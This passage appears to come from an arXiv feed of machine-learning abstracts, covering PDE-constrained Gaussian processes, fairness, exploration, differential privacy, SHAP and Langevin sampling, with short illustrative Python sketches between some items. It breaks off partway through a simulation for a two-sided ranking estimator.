    Partial differential equations (PDEs) are important tools to model physical systems, and incorporating them into machine learning models is an important way of embedding physical knowledge. Given any system of linear PDEs with constant coefficients, we propose a family of Gaussian process (GP) priors, which we call EPGP, such that all realizations are exact solutions of this system. We apply the Ehrenpreis-Palamodov fundamental principle, which works as a non-linear Fourier transform, to construct GP kernels mirroring standard spectral methods for GPs. Our approach can infer probable solutions of linear PDE systems from any data such as noisy measurements, or pointwise defined initial and boundary conditions. Constructing EPGP-priors is algorithmic, generally applicable, and comes with a sparse version (S-EPGP) that learns the relevant spectral frequencies and works better for big data sets. We demonstrate our approach on three families of systems of PDEs, the heat equation, wave equation, and Maxwell's equations, where we improve upon the state of the art in computation time and precision, in some experiments by several orders of magnitude.
    Correcting Underrepresentation and Intersectional Bias for Fair Classification. (arXiv:2306.11112v2 [cs.LG] UPDATED)
    We consider the problem of learning from data corrupted by underrepresentation bias, where positive examples are filtered from the data at different, unknown rates for a fixed number of sensitive groups. We show that with a small amount of unbiased data, we can efficiently estimate the group-wise drop-out parameters, even in settings where intersectional group membership makes learning each intersectional rate computationally infeasible. Using this estimate for the group-wise drop-out rate, we construct a re-weighting scheme that allows us to approximate the loss of any hypothesis on the true distribution, even if we only observe the empirical error on a biased sample. Finally, we present an algorithm encapsulating this learning and re-weighting process, and we provide strong PAC-style guarantees that, with high probability, our estimate of the risk of the hypothesis over the true distribution will be arbitrarily close to the true risk.
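    The re-weighting step can be sketched concretely. This is a hypothetical simplification assuming binary labels and a single sensitive attribute: estimate each group's positive-retention rate from the small unbiased sample, then weight observed positives by the inverse rate. The function names and the weighted-average risk below are illustrative, not the paper's exact estimator.

```python
import numpy as np

def estimate_retention(unbiased_pos_counts, biased_pos_counts):
    """Per-group retention rate: fraction of positives surviving the filter,
    estimated by comparing a small unbiased sample with the biased one."""
    return {g: biased_pos_counts[g] / unbiased_pos_counts[g]
            for g in unbiased_pos_counts}

def reweighted_risk(losses, labels, groups, retention):
    """Importance-weighted empirical risk: each observed positive in group g
    gets weight 1/beta_g, approximating the loss on the true distribution."""
    weights = np.array([1.0 / retention[g] if y == 1 else 1.0
                        for y, g in zip(labels, groups)])
    return np.average(losses, weights=weights)
```

The weighted average stands in for the loss of a hypothesis on the unfiltered distribution, even though only the biased sample is observed.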
    Curiosity in Hindsight: Intrinsic Exploration in Stochastic Environments. (arXiv:2211.10515v2 [stat.ML] UPDATED)
    Consider the problem of exploration in sparse-reward or reward-free environments, such as in Montezuma's Revenge. In the curiosity-driven paradigm, the agent is rewarded for how much each realized outcome differs from their predicted outcome. But using predictive error as intrinsic motivation is fragile in stochastic environments, as the agent may become trapped by high-entropy areas of the state-action space, such as a "noisy TV". In this work, we study a natural solution derived from structural causal models of the world: Our key idea is to learn representations of the future that capture precisely the unpredictable aspects of each outcome -- which we use as additional input for predictions, such that intrinsic rewards only reflect the predictable aspects of world dynamics. First, we propose incorporating such hindsight representations into models to disentangle "noise" from "novelty", yielding Curiosity in Hindsight: a simple and scalable generalization of curiosity that is robust to stochasticity. Second, we instantiate this framework for the recently introduced BYOL-Explore algorithm as our prime example, resulting in the noise-robust BYOL-Hindsight. Third, we illustrate its behavior under a variety of different stochasticities in a grid world, and find improvements over BYOL-Explore in hard-exploration Atari games with sticky actions. Notably, we show state-of-the-art results in exploring Montezuma's Revenge with sticky actions, while preserving performance in the non-sticky setting.
    Multi-view self-supervised learning for multivariate variable-channel time series. (arXiv:2307.09614v2 [stat.ML] UPDATED)
    Labeling of multivariate biomedical time series data is a laborious and expensive process. Self-supervised contrastive learning alleviates the need for large, labeled datasets through pretraining on unlabeled data. However, for multivariate time series data, the set of input channels often varies between applications, and most existing work does not allow for transfer between datasets with different sets of input channels. We propose learning one encoder to operate on all input channels individually. We then use a message passing neural network to extract a single representation across channels. We demonstrate the potential of this method by pretraining our model on a dataset with six EEG channels and then fine-tuning it on a dataset with two different EEG channels. We compare models with and without the message passing neural network across different contrastive loss functions. We show that our method, combined with the TS2Vec loss, outperforms all other methods in most settings.
    The Unreasonable Effectiveness of Deep Evidential Regression. (arXiv:2205.10060v3 [cs.LG] UPDATED)
    There is a significant need for principled uncertainty reasoning in machine learning systems as they are increasingly deployed in safety-critical domains. A new approach with uncertainty-aware regression-based neural networks (NNs), based on learning evidential distributions for aleatoric and epistemic uncertainties, shows promise over traditional deterministic methods and typical Bayesian NNs, notably with the capabilities to disentangle aleatoric and epistemic uncertainties. Despite some empirical success of Deep Evidential Regression (DER), there are important gaps in the mathematical foundation that raise the question of why the proposed technique seemingly works. We detail the theoretical shortcomings and analyze the performance on synthetic and real-world data sets, showing that Deep Evidential Regression is a heuristic rather than an exact uncertainty quantification. We go on to discuss corrections and redefinitions of how aleatoric and epistemic uncertainties should be extracted from NNs.
    Pre-trained Perceptual Features Improve Differentially Private Image Generation. (arXiv:2205.12900v4 [stat.ML] UPDATED)
    Training even moderately-sized generative models with differentially-private stochastic gradient descent (DP-SGD) is difficult: the required level of noise for reasonable levels of privacy is simply too large. We advocate instead building off a good, relevant representation on an informative public dataset, then learning to model the private data with that representation. In particular, we minimize the maximum mean discrepancy (MMD) between private target data and a generator's distribution, using a kernel based on perceptual features learned from a public dataset. With the MMD, we can simply privatize the data-dependent term once and for all, rather than introducing noise at each step of optimization as in DP-SGD. Our algorithm allows us to generate CIFAR10-level images with $\epsilon \approx 2$ which capture distinctive features in the distribution, far surpassing the current state of the art, which mostly focuses on datasets such as MNIST and FashionMNIST at a large $\epsilon \approx 10$. Our work introduces simple yet powerful foundations for reducing the gap between private and non-private deep generative models. Our code is available at \url{https://github.com/ParkLabML/DP-MEPF}.
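    The "privatize once" idea can be sketched as follows. The feature map below is a random stand-in for the paper's pretrained perceptual features, and the noise calibration is schematic rather than a verified DP accounting; only the structure (clip per-example embeddings, release one noised mean, then match it) follows the abstract.

```python
import numpy as np

rng = np.random.default_rng(0)

def features(x, W):
    """Stand-in 'perceptual' feature map (the paper uses pretrained features)."""
    return np.tanh(x @ W)

def privatized_mean_embedding(private_data, W, clip=1.0, sigma=1.0):
    """Release the mean feature embedding once, under Gaussian noise."""
    phi = features(private_data, W)
    # clip each embedding's norm to bound per-example sensitivity
    norms = np.maximum(np.linalg.norm(phi, axis=1, keepdims=True) / clip, 1.0)
    phi = phi / norms
    mean = phi.mean(axis=0)
    # schematic noise scale; a real DP release would calibrate to (eps, delta)
    noise = rng.normal(0.0, sigma * clip / len(private_data), size=mean.shape)
    return mean + noise

def generator_loss(gen_samples, priv_mean, W):
    """First-moment MMD surrogate: match the privatized mean embedding."""
    return float(np.sum((features(gen_samples, W).mean(axis=0) - priv_mean) ** 2))
```

Because the private data enter only through the single released mean, the generator can then be optimized for any number of steps without further privacy cost, unlike per-step noising in DP-SGD.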
    Analyzing sports commentary in order to automatically recognize events and extract insights. (arXiv:2307.10303v1 [cs.CL])
    In this paper, we investigate how multiple Natural Language Processing techniques and methods can be used to automatically recognize the main actions in sports events. We aim to extract insights by analyzing live sport commentaries from different sources and by classifying these major actions into different categories. We also study whether sentiment analysis could help detect these main actions.
    Mitigating Voter Attribute Bias for Fair Opinion Aggregation. (arXiv:2307.10749v1 [cs.HC])
    The aggregation of multiple opinions plays a crucial role in decision-making, such as in hiring and loan review, and in labeling data for supervised learning. Although majority voting and existing opinion aggregation models are effective for simple tasks, they are inappropriate for tasks without objectively true labels in which disagreements may occur. In particular, when voter attributes such as gender or race introduce bias into opinions, the aggregation results may vary depending on the composition of voter attributes. A balanced group of voters is desirable for fair aggregation results but may be difficult to prepare. In this study, we consider methods to achieve fair opinion aggregation based on voter attributes and evaluate the fairness of the aggregated results. To this end, we consider an approach that combines opinion aggregation models such as majority voting and the Dawid and Skene model (D&S model) with fairness options such as sample weighting. To evaluate the fairness of opinion aggregation, probabilistic soft labels are preferred over discrete class labels. First, we address the problem of soft label estimation without considering voter attributes and identify some issues with the D&S model. To address these limitations, we propose a new Soft D&S model with improved accuracy in estimating soft labels. Moreover, we evaluated the fairness of an opinion aggregation model, including Soft D&S, in combination with different fairness options using synthetic and semi-synthetic data. The experimental results suggest that the combination of Soft D&S and data splitting as a fairness option is effective for dense data, whereas weighted majority voting is effective for sparse data. These findings should prove particularly valuable in supporting decision-making by human and machine-learning models with balanced opinion aggregation.
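    The weighted majority voting fairness option can be illustrated with a minimal sketch in which each voter's weight is the inverse of their attribute-group size, so that attribute groups contribute equally to the soft label. The weighting rule is illustrative, not necessarily the exact scheme evaluated in the paper.

```python
from collections import Counter

def weighted_soft_vote(votes, attrs):
    """Probabilistic soft label from binary votes, with voter attribute
    groups balanced by inverse group size.

    votes: list of 0/1 opinions; attrs: the voter attribute behind each vote.
    """
    group_size = Counter(attrs)
    weights = [1.0 / group_size[a] for a in attrs]
    total = sum(weights)
    return sum(w * v for w, v in zip(weights, votes)) / total
```

With three 'm' voters saying 1 and one 'f' voter saying 0, unweighted voting gives 0.75, whereas the balanced soft label is 0.5: each group's aggregate opinion counts once.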
    Sharpness Minimization Algorithms Do Not Only Minimize Sharpness To Achieve Better Generalization. (arXiv:2307.11007v1 [cs.LG])
    Despite extensive studies, the underlying reason as to why overparameterized neural networks can generalize remains elusive. Existing theory shows that common stochastic optimizers prefer flatter minimizers of the training loss, and thus a natural potential explanation is that flatness implies generalization. This work critically examines this explanation. Through theoretical and empirical investigation, we identify the following three scenarios for two-layer ReLU networks: (1) flatness provably implies generalization; (2) there exist non-generalizing flattest models and sharpness minimization algorithms fail to generalize, and (3) perhaps most surprisingly, there exist non-generalizing flattest models, but sharpness minimization algorithms still generalize. Our results suggest that the relationship between sharpness and generalization subtly depends on the data distributions and the model architectures and sharpness minimization algorithms do not only minimize sharpness to achieve better generalization. This calls for the search for other explanations for the generalization of over-parameterized neural networks.
    Implicit Multidimensional Projection of Local Subspaces. (arXiv:2009.03259v2 [cs.LG] UPDATED)
    We propose a visualization method to understand the effect of multidimensional projection on local subspaces, using implicit function differentiation. Here, we understand the local subspace as the multidimensional local neighborhood of data points. Existing methods focus on the projection of multidimensional data points, and the neighborhood information is ignored. Our method is able to analyze the shape and directional information of the local subspace to gain more insights into the global structure of the data through the perception of local structures. Local subspaces are fitted by multidimensional ellipses that are spanned by basis vectors. An accurate and efficient vector transformation method is proposed based on analytical differentiation of multidimensional projections formulated as implicit functions. The results are visualized as glyphs and analyzed using a full set of specifically-designed interactions supported in our efficient web-based visualization tool. The usefulness of our method is demonstrated using various multi- and high-dimensional benchmark datasets. Our implicit differentiation vector transformation is evaluated through numerical comparisons; the overall method is evaluated through exploration examples and use cases.
    Sequential Predictive Two-Sample and Independence Testing. (arXiv:2305.00143v2 [stat.ML] UPDATED)
    We study the problems of sequential nonparametric two-sample and independence testing. Sequential tests process data online and allow using observed data to decide whether to stop and reject the null hypothesis or to collect more data, while maintaining type I error control. We build upon the principle of (nonparametric) testing by betting, where a gambler places bets on future observations and their wealth measures evidence against the null hypothesis. While recently developed kernel-based betting strategies often work well on simple distributions, selecting a suitable kernel for high-dimensional or structured data, such as images, is often nontrivial. To address this drawback, we design prediction-based betting strategies that rely on the following fact: if a sequentially updated predictor starts to consistently determine (a) which distribution an instance is drawn from, or (b) whether an instance is drawn from the joint distribution or the product of the marginal distributions (the latter produced by external randomization), it provides evidence against the two-sample or independence nulls respectively. We empirically demonstrate the superiority of our tests over kernel-based approaches under structured settings. Our tests can be applied beyond the case of independent and identically distributed data, remaining valid and powerful even when the data distribution drifts over time.
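    The betting principle behind such prediction-based tests can be sketched in a few lines. Under the two-sample null, the source label of each observation is a fair coin given the observation, so multiplying wealth by twice the predicted probability of the realized label yields a nonnegative martingale; Ville's inequality then licenses rejection once wealth reaches 1/alpha. The predictor interface below is an assumption for illustration, not the paper's exact construction.

```python
import numpy as np

def sequential_two_sample_test(stream, predict, alpha=0.05, clip=0.01):
    """Betting-based sequential two-sample test.

    stream: iterable of (x, y) with y in {0, 1} indicating which sample x
            was drawn from.
    predict: callable x -> estimated P(y = 1 | x); the caller may update it
             online as data accrue.
    Under H0 the wealth process is a nonnegative martingale with mean 1, so
    rejecting when wealth >= 1/alpha controls type I error at level alpha.
    """
    wealth, t = 1.0, 0
    for t, (x, y) in enumerate(stream, 1):
        q = np.clip(predict(x), clip, 1 - clip)   # avoid bankrupting bets
        wealth *= 2 * (q if y == 1 else 1 - q)
        if wealth >= 1 / alpha:
            return True, t, wealth                # reject H0, stop early
    return False, t, wealth
```

An uninformative predictor (always 0.5) keeps wealth constant at 1, while a predictor that consistently identifies the source drives wealth up exponentially, triggering rejection.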
    Privacy Amplification via Importance Sampling. (arXiv:2307.10187v1 [cs.CR])
    We examine the privacy-enhancing properties of subsampling a data set via importance sampling as a pre-processing step for differentially private mechanisms. This extends the established privacy amplification by subsampling result to importance sampling where each data point is weighted by the reciprocal of its selection probability. The implications for privacy of weighting each point are not obvious. On the one hand, a lower selection probability leads to a stronger privacy amplification. On the other hand, the higher the weight, the stronger the influence of the point on the output of the mechanism in the event that the point does get selected. We provide a general result that quantifies the trade-off between these two effects. We show that heterogeneous sampling probabilities can lead to both stronger privacy and better utility than uniform subsampling while retaining the subsample size. In particular, we formulate and solve the problem of privacy-optimal sampling, that is, finding the importance weights that minimize the expected subset size subject to a given privacy budget. Empirically, we evaluate the privacy, efficiency, and accuracy of importance sampling-based privacy amplification on the example of k-means clustering.
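    The importance-sampling estimator at the core of the analysis can be sketched as a Horvitz-Thompson style subsample: include point i with probability p_i and weight survivors by 1/p_i, which keeps the estimator unbiased. The sampling probabilities below are illustrative; the paper's privacy-optimal weights come from solving the stated optimization problem.

```python
import numpy as np

rng = np.random.default_rng(0)

def importance_subsample(data, probs):
    """Poisson-subsample: keep point i w.p. p_i, weight it by 1/p_i."""
    keep = rng.random(len(data)) < probs
    return data[keep], 1.0 / probs[keep]

def weighted_sum(points, weights):
    """Unbiased (Horvitz-Thompson) estimator of the full-data sum."""
    return float(np.sum(points * weights))
```

Points with low selection probability enjoy stronger privacy amplification but carry larger weights when selected, which is exactly the trade-off the paper quantifies.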
    Amortized Variational Inference: When and Why?. (arXiv:2307.11018v1 [stat.ML])
    Amortized variational inference (A-VI) is a method for approximating the intractable posterior distributions that arise in probabilistic models. The defining feature of A-VI is that it learns a global inference function that maps each observation to its local latent variable's approximate posterior. This stands in contrast to the more classical factorized (or mean-field) variational inference (F-VI), which directly learns the parameters of the approximating distribution for each latent variable. In deep generative models, A-VI is used as a computational trick to speed up inference for local latent variables. In this paper, we study A-VI as a general alternative to F-VI for approximate posterior inference. A-VI cannot produce an approximation with a lower Kullback-Leibler divergence than F-VI's optimal solution, because the amortized family is a subset of the factorized family. Thus a central theoretical problem is to characterize when A-VI still attains F-VI's optimal solution. We derive conditions on both the model and the inference function under which A-VI can theoretically achieve F-VI's optimum. We show that for a broad class of hierarchical models, including deep generative models, it is possible to close the gap between A-VI and F-VI. Further, for an even broader class of models, we establish when and how to expand the domain of the inference function to make amortization a feasible strategy. Finally, we prove that for certain models -- including hidden Markov models and Gaussian processes -- A-VI cannot match F-VI's solution, no matter how expressive the inference function is. We also study A-VI empirically. On several examples, we corroborate our theoretical results and investigate the performance of A-VI when varying the complexity of the inference function. When the gap between A-VI and F-VI can be closed, we find that the required complexity of the function need not scale with the number of observations, and that A-VI often converges faster than F-VI.
    Provably Efficient UCB-type Algorithms For Learning Predictive State Representations. (arXiv:2307.00405v2 [cs.LG] UPDATED)
    The general sequential decision-making problem, which includes Markov decision processes (MDPs) and partially observable MDPs (POMDPs) as special cases, aims at maximizing a cumulative reward by making a sequence of decisions based on a history of observations and actions over time. Recent studies have shown that the sequential decision-making problem is statistically learnable if it admits a low-rank structure modeled by predictive state representations (PSRs). Despite these advancements, existing approaches typically involve oracles or steps that are not computationally efficient. On the other hand, the upper confidence bound (UCB) based approaches, which have served successfully as computationally efficient methods in bandits and MDPs, have not been investigated for more general PSRs, due to the difficulty of optimistic bonus design in these more challenging settings. This paper proposes the first known UCB-type approach for PSRs, featuring a novel bonus term that upper bounds the total variation distance between the estimated and true models. We further characterize the sample complexity bounds for our designed UCB-type algorithms for both online and offline PSRs. In contrast to existing approaches for PSRs, our UCB-type algorithms enjoy computational efficiency, last-iterate guaranteed near-optimal policy, and guaranteed model accuracy.
    Fisher-Rao distance and pullback SPD cone distances between multivariate normal distributions. (arXiv:2307.10644v1 [cs.LG])
    Data sets of multivariate normal distributions abound in many scientific areas like diffusion tensor imaging, structure tensor computer vision, radar signal processing, and machine learning, just to name a few. In order to process those normal data sets for downstream tasks like filtering, classification or clustering, one needs to define proper notions of dissimilarities between normals and paths joining them. The Fisher-Rao distance, defined as the Riemannian geodesic distance induced by the Fisher information metric, is one such principled metric distance; however, it is not known in closed form except for a few particular cases. In this work, we first report a fast and robust method to approximate arbitrarily finely the Fisher-Rao distance between multivariate normal distributions. Second, we introduce a class of distances based on diffeomorphic embeddings of the normal manifold into a submanifold of the higher-dimensional symmetric positive-definite cone corresponding to the manifold of centered normal distributions. We show that the projective Hilbert distance on the cone yields a metric on the embedded normal submanifold, and we pull back that cone distance with its associated straight-line Hilbert cone geodesics to obtain a distance and smooth paths between normal distributions. Compared to the Fisher-Rao distance approximation, the pullback Hilbert cone distance is computationally light, since it requires computing only the extreme minimal and maximal eigenvalues of matrices. Finally, we show how to use those distances in clustering tasks.
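    The computational claim can be illustrated on the SPD cone itself: the Hilbert projective distance between two SPD matrices A and B depends only on the extreme eigenvalues of A^{-1}B. A minimal numerical sketch follows, where a dense eigendecomposition stands in for whatever extreme-eigenvalue solver one would use at scale.

```python
import numpy as np

def hilbert_spd_distance(A, B):
    """Hilbert projective distance on the SPD cone:
    log(lambda_max(A^{-1} B)) - log(lambda_min(A^{-1} B)).
    Only the two extreme eigenvalues are needed."""
    lam = np.linalg.eigvals(np.linalg.solve(A, B)).real  # real for SPD pairs
    return float(np.log(lam.max()) - np.log(lam.min()))
```

Being projective, the distance is invariant to positive scaling (d(A, cA) = 0), which is why it metrizes rays of the cone rather than the cone itself; the paper's embedding accounts for this when pulling the distance back to normal distributions.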
    Ensemble Learning based Anomaly Detection for IoT Cybersecurity via Bayesian Hyperparameters Sensitivity Analysis. (arXiv:2307.10596v1 [cs.LG])
    The Internet of Things (IoT) integrates billions of intelligent devices across the globe, capable of communicating with other connected devices with little to no human intervention. IoT enables data aggregation and analysis on a large scale to improve quality of life in many domains. In particular, data collected by IoT contain a tremendous amount of information for anomaly detection. The heterogeneous nature of IoT is both a challenge and an opportunity for cybersecurity. Traditional approaches in cybersecurity monitoring often require different kinds of data pre-processing and handling for various data types, which might be problematic for datasets that contain heterogeneous features. However, heterogeneous types of network devices can often capture a more diverse set of signals than a single type of device, which is particularly useful for anomaly detection. In this paper, we present a comprehensive study on using ensemble machine learning methods for enhancing IoT cybersecurity via anomaly detection. Rather than relying on a single machine learning model, ensemble learning combines the predictive power of multiple models, enhancing predictive accuracy on heterogeneous datasets. We propose a unified framework with ensemble learning that utilises Bayesian hyperparameter optimisation to adapt to a network environment that contains multiple IoT sensor readings. Experimentally, we illustrate its high predictive power when compared to traditional methods.
    Pythae: Unifying Generative Autoencoders in Python -- A Benchmarking Use Case. (arXiv:2206.08309v2 [cs.LG] UPDATED)
    In recent years, deep generative models have attracted increasing interest due to their capacity to model complex distributions. Among those models, variational autoencoders have gained popularity as they have proven both to be computationally efficient and yield impressive results in multiple fields. Following this breakthrough, extensive research has been done in order to improve the original publication, resulting in a variety of different VAE models in response to different tasks. In this paper we present Pythae, a versatile open-source Python library providing both a unified implementation and a dedicated framework allowing straightforward, reproducible and reliable use of generative autoencoder models. We then propose to use this library to perform a case study benchmark where we present and compare 19 generative autoencoder models representative of some of the main improvements on downstream tasks such as image reconstruction, generation, classification, clustering and interpolation. The open-source library can be found at https://github.com/clementchadebec/benchmark_VAE.
    Label Calibration for Semantic Segmentation Under Domain Shift. (arXiv:2307.10842v1 [cs.CV])
    Performance of a pre-trained semantic segmentation model is likely to substantially decrease on data from a new domain. We show a pre-trained model can be adapted to unlabelled target domain data by calculating soft-label prototypes under the domain shift and making predictions according to the prototype closest to the vector with predicted class probabilities. The proposed adaptation procedure is fast, comes almost for free in terms of computational resources and leads to considerable performance improvements. We demonstrate the benefits of such label calibration on the highly-practical synthetic-to-real semantic segmentation problem.
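    The prototype-based adaptation can be sketched roughly as follows, assuming per-sample class-probability vectors from the pre-trained model are available. The helper names and the Euclidean nearest-prototype rule are illustrative assumptions.

```python
import numpy as np

def fit_prototypes(probs):
    """One soft-label prototype per class: the mean predicted-probability
    vector over target-domain samples currently assigned to that class."""
    hard = probs.argmax(axis=1)
    C = probs.shape[1]
    return np.stack([probs[hard == c].mean(axis=0) if np.any(hard == c)
                     else np.eye(C)[c]              # empty class: one-hot fallback
                     for c in range(C)])

def predict_by_prototype(probs, prototypes):
    """Relabel each sample by its nearest prototype in probability space."""
    d = np.linalg.norm(probs[:, None, :] - prototypes[None, :, :], axis=2)
    return d.argmin(axis=1)
```

The adaptation needs only one pass to build the prototypes and one distance computation per prediction, which is why it comes almost for free computationally.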
    A New Computationally Simple Approach for Implementing Neural Networks with Output Hard Constraints. (arXiv:2307.10459v1 [cs.LG])
    A new, computationally simple method of imposing hard convex constraints on neural network output values is proposed. The key idea behind the method is to map a vector of hidden parameters of the network to a point that is guaranteed to lie inside the feasible set defined by a set of constraints. The mapping is implemented by an additional neural network layer with constrained output. The proposed method extends straightforwardly to the case where constraints are imposed not only on the output vectors but also jointly on outputs and inputs. The projection approach to imposing constraints on outputs can be simply implemented within the framework of the proposed method. We show how to incorporate different types of constraints into the proposed method, including linear and quadratic constraints, equality constraints, dynamic constraints, and constraints in the form of boundaries. An important feature of the method is its computational simplicity. The complexities of the forward pass of the proposed neural network layer under linear and quadratic constraints are O(n*m) and O(n^2*m), respectively, where n is the number of variables and m is the number of constraints. Numerical experiments illustrate the method by solving optimization and classification problems. The code implementing the method is publicly available.
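    Two easy special cases of such a feasible-set mapping can be sketched directly: box constraints via an elementwise sigmoid and the probability simplex via softmax. These are simplifications for illustration only; the paper's layer handles general convex constraints.

```python
import numpy as np

def box_constrained_output(z, lo, hi):
    """Map an unconstrained hidden vector z to a point guaranteed to lie
    inside the box [lo, hi] (elementwise sigmoid reparameterization)."""
    return lo + (hi - lo) / (1.0 + np.exp(-z))

def simplex_constrained_output(z):
    """Map z onto the probability simplex (nonnegative, sums to 1) via a
    numerically stable softmax."""
    e = np.exp(z - z.max())
    return e / e.sum()
```

In both cases the constraint is satisfied by construction for every value of z, so no projection or post-hoc correction is needed during training or inference.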
    Multiply Robust Estimator Circumvents Hyperparameter Tuning of Neural Network Models in Causal Inference. (arXiv:2307.10536v1 [stat.ME])
    Estimation of the Average Treatment Effect (ATE) is often carried out in two steps: in the first step, the treatment and outcome are modeled, and in the second step, the predictions are inserted into the ATE estimator. In the first step, numerous models can be fit to the treatment and outcome, including machine learning algorithms. However, it is a difficult task to choose among the hyperparameter sets the one that will result in the best causal effect estimation and inference. The Multiply Robust (MR) estimator allows us to leverage all the first-step models in a single estimator. We show that the MR estimator is $n^r$-consistent if one of the first-step treatment or outcome models is $n^r$-consistent. We also show that MR is the solution to a broad class of estimating equations, and is asymptotically normal if one of the treatment models is $\sqrt{n}$-consistent. The standard error of MR is also calculated, and it does not require knowledge of the true models in the first step. Our simulation study supports the theoretical findings.
    Long-Tail Theory under Gaussian Mixtures. (arXiv:2307.10736v1 [cs.LG])
    We suggest a simple Gaussian mixture model for data generation that complies with Feldman's long tail theory (2020). We demonstrate that a linear classifier cannot decrease the generalization error below a certain level in the proposed model, whereas a nonlinear classifier with a memorization capacity can. This confirms that for long-tailed distributions, rare training examples must be considered for optimal generalization to new data. Finally, we show that the performance gap between linear and nonlinear models can be lessened as the tail becomes shorter in the subpopulation frequency distribution, as confirmed by experiments on synthetic and real data.
    Determination of the critical points for systems of directed percolation class using machine learning. (arXiv:2307.10456v1 [cond-mat.stat-mech])
    Recently, machine learning algorithms have been used remarkably to study equilibrium phase transitions; however, only a few works have applied this technique to nonequilibrium phase transitions. In this work, we use supervised learning with a convolutional neural network (CNN) and unsupervised learning with the density-based spatial clustering of applications with noise (DBSCAN) algorithm to study the nonequilibrium phase transition in two models. We use CNN and DBSCAN to determine the critical points of the directed bond percolation (bond DP) model and the Domany-Kinzel cellular automaton (DK) model. Both models have been proven to exhibit a nonequilibrium phase transition belonging to the directed percolation (DP) universality class. For supervised learning, we train the CNN on images generated from Monte Carlo simulations of directed bond percolation and use the trained CNN to study the phase transition in both models. For unsupervised learning, we train DBSCAN on the raw Monte Carlo data; in this case, we retrain DBSCAN each time we change the model or lattice size. Our results from both algorithms show that, even for very small lattice sizes, the machine can predict the critical points accurately for both models. Finally, we note that the critical point we find here for the bond DP model using CNN or DBSCAN is exactly the value previously found using transfer learning with a domain adversarial neural network (DANN) algorithm.
    Conditional expectation network for SHAP. (arXiv:2307.10654v1 [cs.LG])
    A very popular model-agnostic technique for explaining predictive models is the SHapley Additive exPlanation (SHAP). The two most popular versions of SHAP are a conditional expectation version and an unconditional expectation version (the latter is also known as interventional SHAP). Except for tree-based methods, usually the unconditional version is used (for computational reasons). We provide a (surrogate) neural network approach which allows us to efficiently calculate the conditional version for both neural networks and other regression models, and which properly considers the dependence structure in the feature components. This proposal is also useful to provide drop1 and anova analyses in complex regression models which are similar to their generalized linear model (GLM) counterparts, and we provide a partial dependence plot (PDP) counterpart that considers the right dependence structure in the feature components.
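For readers new to SHAP, the object being approximated can be computed exactly for tiny models. A brute-force sketch of the unconditional (interventional) flavour mentioned above, where features outside the coalition are reset to a fixed background value (a toy illustration; real SHAP implementations never enumerate all coalitions):

```python
import numpy as np
from itertools import combinations
from math import factorial

# Exact Shapley values by enumerating every coalition S of the other
# features; v(S) is the model output with features outside S reset to
# the background value (unconditional/interventional flavour).
def shapley_values(model, x, background):
    d = len(x)
    phi = np.zeros(d)
    for i in range(d):
        others = [j for j in range(d) if j != i]
        for size in range(d):
            for S in combinations(others, size):
                weight = factorial(size) * factorial(d - size - 1) / factorial(d)
                with_i = background.copy()
                with_i[list(S) + [i]] = x[list(S) + [i]]
                without_i = background.copy()
                without_i[list(S)] = x[list(S)]
                phi[i] += weight * (model(with_i) - model(without_i))
    return phi

model = lambda z: 2 * z[0] + z[1] * z[2]  # toy model with an interaction
phi = shapley_values(model, np.array([1.0, 2.0, 3.0]), np.zeros(3))
print(np.round(phi, 3))  # efficiency: phi sums to model(x) - model(background)
```

The interaction term's credit is split evenly between features 1 and 2, and the attributions sum to the model's deviation from the background prediction.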
    Towards a Complete Analysis of Langevin Monte Carlo: Beyond Poincar\'e Inequality. (arXiv:2303.03589v2 [math.ST] UPDATED)
    Langevin diffusions are rapidly convergent under appropriate functional inequality assumptions. Hence, it is natural to expect that with additional smoothness conditions to handle the discretization errors, their discretizations like the Langevin Monte Carlo (LMC) converge in a similar fashion. This research program was initiated by Vempala and Wibisono (2019), who established results under log-Sobolev inequalities. Chewi et al. (2022) extended the results to handle the case of Poincar\'e inequalities. In this paper, we go beyond Poincar\'e inequalities, and push this research program to its limit. We do so by establishing upper and lower bounds for Langevin diffusions and LMC under weak Poincar\'e inequalities that are satisfied by a large class of densities including polynomially-decaying heavy-tailed densities (i.e., Cauchy-type). Our results explicitly quantify the effect of the initializer on the performance of the LMC algorithm. In particular, we show that as the tail goes from sub-Gaussian, to sub-exponential, and finally to Cauchy-like, the dependency on the initial error goes from being logarithmic, to polynomial, and then finally to being exponential. This three-step phase transition is in particular unavoidable as demonstrated by our lower bounds, clearly defining the boundaries of LMC.
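For concreteness, the unadjusted LMC iteration the paper analyses is a one-line update, x_{k+1} = x_k - h ∇U(x_k) + √(2h) ξ_k. A minimal sketch for a standard Gaussian target (step size and initializer are illustrative):

```python
import numpy as np

rng = np.random.default_rng(0)

# Unadjusted Langevin Monte Carlo for a standard Gaussian target,
# U(x) = x^2 / 2, so grad U(x) = x.
h, n_steps = 0.05, 20_000
x = 5.0  # deliberately bad initializer; its influence decays over iterations
samples = []
for _ in range(n_steps):
    x = x - h * x + np.sqrt(2 * h) * rng.standard_normal()
    samples.append(x)

burned = np.array(samples[5_000:])  # discard burn-in
print(f"mean ≈ {burned.mean():.2f}, var ≈ {burned.var():.2f}")
```

For this light-tailed (sub-Gaussian) target the effect of the initializer washes out quickly; the paper's point is that for heavy-tailed, Cauchy-like targets the dependence on the initial error becomes exponential rather than logarithmic.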
    An IPW-based Unbiased Ranking Metric in Two-sided Markets. (arXiv:2307.10204v1 [cs.IR])
In modern recommendation systems, unbiased learning-to-rank (LTR) is crucial for prioritizing items from biased implicit user feedback, such as click data. Several techniques, such as Inverse Propensity Weighting (IPW), have been proposed for single-sided markets. However, less attention has been paid to two-sided markets, such as job platforms or dating services, where successful conversions require matching preferences from both users. This paper addresses the complex interaction of biases between users in two-sided markets and proposes a tailored LTR approach. We first present a formulation of feedback mechanisms in two-sided matching platforms and point out that their implicit feedback may include position bias from both user groups. On the basis of this observation, we extend the IPW estimator and propose a new estimator, named two-sided IPW, to address the position biases in two-sided markets. We prove that the proposed estimator satisfies unbiasedness for the ground-truth ranking metric. We conducted numerical experiments on real-world two-sided platforms and demonstrated the effectiveness of our proposed method in terms of both precision and robustness. Our experiments showed that our method outperformed baselines especially when handling rare items, which are less frequently observed in the training data.
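The intuition behind a two-sided propensity correction can be seen in a toy simulation (an illustration of the general idea, not the paper's estimator): a conversion is observed only if both sides examine the pair, so weighting by the inverse product of the two exposure propensities debiases the naive estimate.

```python
import numpy as np

rng = np.random.default_rng(0)

# Each candidate pair is examined by side A with propensity theta_a and
# by side B with propensity theta_b (e.g. position-dependent). A match
# is recorded only if both examine it AND the pair is truly relevant.
n = 200_000
true_relevance = 0.3                     # ground-truth match probability
theta_a = rng.uniform(0.2, 1.0, size=n)  # side-A exposure propensity
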